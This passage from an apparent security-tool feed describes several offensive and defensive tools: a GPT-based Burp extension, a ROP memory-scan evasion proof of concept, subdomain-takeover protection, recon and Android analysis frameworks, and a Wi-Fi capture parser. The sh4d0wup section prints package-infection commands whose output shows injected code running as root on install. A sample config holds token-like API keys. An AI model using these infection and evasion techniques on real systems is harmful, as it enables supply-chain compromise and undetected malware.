    [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

  1. Build tool:
  • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
  1. Environment variables:
  • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

Installation

1. Compilation

  1. Ensure you have Gradle installed and configured.

  2. Download the burpgpt repository:

    git clone https://github.com/aress31/burpgpt
    cd .\burpgpt\
  3. Build the standalone jar:

    ./gradlew shadowJar

2. Loading the Extension Into Burp Suite

To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

Usage

To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

  1. Enter a valid OpenAI API key.
  2. Select a model.
  3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
  4. Adjust or create custom prompts according to your requirements.

Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

Prompt Configuration

burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

Placeholder Description
{REQUEST} The scanned request.
{URL} The URL of the scanned request.
{METHOD} The HTTP request method used in the scanned request.
{REQUEST_HEADERS} The headers of the scanned request.
{REQUEST_BODY} The body of the scanned request.
{RESPONSE} The scanned response.
{RESPONSE_HEADERS} The headers of the scanned response.
{RESPONSE_BODY} The body of the scanned response.
{IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.

[!NOTE] > Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

Example Use Cases

The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

  • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

    Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

    Web Application URL: {URL}
    Crypto Library Name: {CRYPTO_LIBRARY_NAME}
    CVE Number: CVE-{CVE_NUMBER}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
  • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

    Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

    Web Application URL: {URL}
    Biometric Authentication Request Headers: {REQUEST_HEADERS}
    Biometric Authentication Response Headers: {RESPONSE_HEADERS}
    Biometric Authentication Request Body: {REQUEST_BODY}
    Biometric Authentication Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
  • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Serverless Function A URL: {URL}
    Serverless Function B URL: {URL}
    Serverless Function A Request Headers: {REQUEST_HEADERS}
    Serverless Function B Response Headers: {RESPONSE_HEADERS}
    Serverless Function A Request Body: {REQUEST_BODY}
    Serverless Function B Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
  • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

    Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

    Web Application URL: {URL}
    SPA Framework Name: {SPA_FRAMEWORK_NAME}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

Roadmap

  • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
  • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
  • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
  • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
  • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

Project Information

The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee

for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

Reporting Issues

Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

Contributing

Looking to make a splash with your mad coding skills?

Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

License

See LICENSE.



RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

By: Zion3R


This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.

The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


The overview of the process is as follows:

  • We use SetUnhandledExceptionFilter to set a new exception filter function.
  • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
  • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
  • The ROP chain is called from the exception filter function, allowing to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and the normal execution continues.

This process repeats indefinitely.

As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

Compilation

Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and run the tool:

C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

Limitations

This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

Credits



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation

Installation

Collaboration

We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completion s Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

You can find examples here:

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Intera ct with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflic ts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: de laying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix and then inserts the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time, eventually it shows a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...


Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

Updating tool to latest version You can run following command to update tool

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines three powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil is a tool that extracts valuable information from an APK file. Lastly, MobFS and RMS facilitates the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these three tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all three tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


Requirements

  • Windows, Linux or Mac
  • NodeJs installed
  • Python 3 installed
  • OpenSSL-3 installed
  • Wkhtmltopdf installed

Installation

To install the tools you need to: First : git clone https://github.com/morpheuslord/QuadraInspect

Second Open a Administrative cmd or powershell (for Mobfs setup) and run : pip install -r requirements.txt && python3 main.py

Third : Once QuadraInspect loads run this command QuadraInspect Main>> : START install_tools

The tools will be downloaded to the tools directory and also the setup.py and setup.bat commands will run automatically for the complete installation.

Usage

Each module has a help function so that the commands and the discriptions are detailed and can be altered for operation.

These are the key points that must be addressed for smooth working:

  • The APK file or target must be declared before starting any attack
  • The Attacks are seperate entities combined via this framework doing research on how to use them is recommended.
  • The APK file can be ether declared ether using args or using SET target withing the tool.
  • The target APK file must be placed in the target folder as all the tool searches for the target file with that folder.

Modes

There are 2 modes:

|
└─> F mode
└─> A mode

F mode

The f mode is a mode where you get the active interface for using the interactive vaerion of the framework with the prompt, etc.

F mode is the normal mode and can be used easily

A mode

A mode or argumentative mode takes the input via arguments and runs the commands without any intervention by the user this is limited to the main menu in the future i am planning to extend this feature to even the encorporated codes.

python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

Main Module

the main menu of the entire tool has these options and commands:

Command Discription
SET target SET the name of the targetfile
START install_tools If not installed this will install the tools
LIST tools_name List out the Tools Intigrated
START apkleaks Use APKLeaks tool
START mobfs Use MOBfs for dynamic and static analysis
START andropass Use AndroPass APK analizer
help Display help menu
SHOW banner Display banner
quit Quit the program

As mentioned above the target must be set before any tool is used.

Apkleaks menu

The APKLeaks menu is also really straight forward and only a few things to consider:

  • The options SET output and SET json-out takes file names not the actual files it creates an output in the result directory.
  • The SET pattern option takes a name of a json pattern file. The JSON file must be located in the pattern directory
OPTION SET Value
SET output Output for the scan data file name
SET arguments Additional Disassembly arguments
SET json-out JSON output file name
SET pattern The pre-searching pattern for secrets
help Displays help menu
return Return to main menu
quit Quit the tool

Mobfs

Mobfs is pritty straight forward only the port number must be taken care of which is by default on port 5000 you just need to start the program and connect to it on 127.0.0.1:5000 over your browser.

AndroPass

AndroPass is also really straight forward it just takes the file as input and does its job without any other inputs.

Architecture:

The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

  • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
  • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
  • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
  • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
  • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

Adding more

Currentluy there only 3 but if wanted people can add more tools to this these are the things to be considered:

  • Installer function
  • Seperate tool function
  • Main function

Installer Function

  • Must edit in the config/installer.py
  • The things to consider in the installer is the link for the repository.
  • keep the cloner and the directory in a try-except condition to avoide errors.
  • choose an appropriate command for further installation

Seperate tool function

  • Must edit in the config/mobfs.py , config/androp.py, config/apkleaks.py
  • Write a new function for the specific tool
  • File handeling is up to you I recommend passing the file name as an argument and then using the name to locate the file using the subprocess function
  • the tools must also recommended to be in a try-except condition to avoide unwanted errors.

Main Function

  • A new case must be added to the switch function to act as a main function holder
  • the help menu listing and commands are up to your requirements and comfort

If wanted you could do your upgrades and add it to this repository for more people to use kind of growing this tool.



Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.

           _   __  _             _  _     
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
|_____|
by r4ulcl

Features

  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks usin Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Arch

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
  • -v $PWD/db.SQLITE:/db.SQLITE: To save de output in current folder db.SQLITE file
  • -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the docker

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.

python3 wifi_db.py scan-01

In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be open with:

Below is an example of a ProbeClientsConnected table.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon i n the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

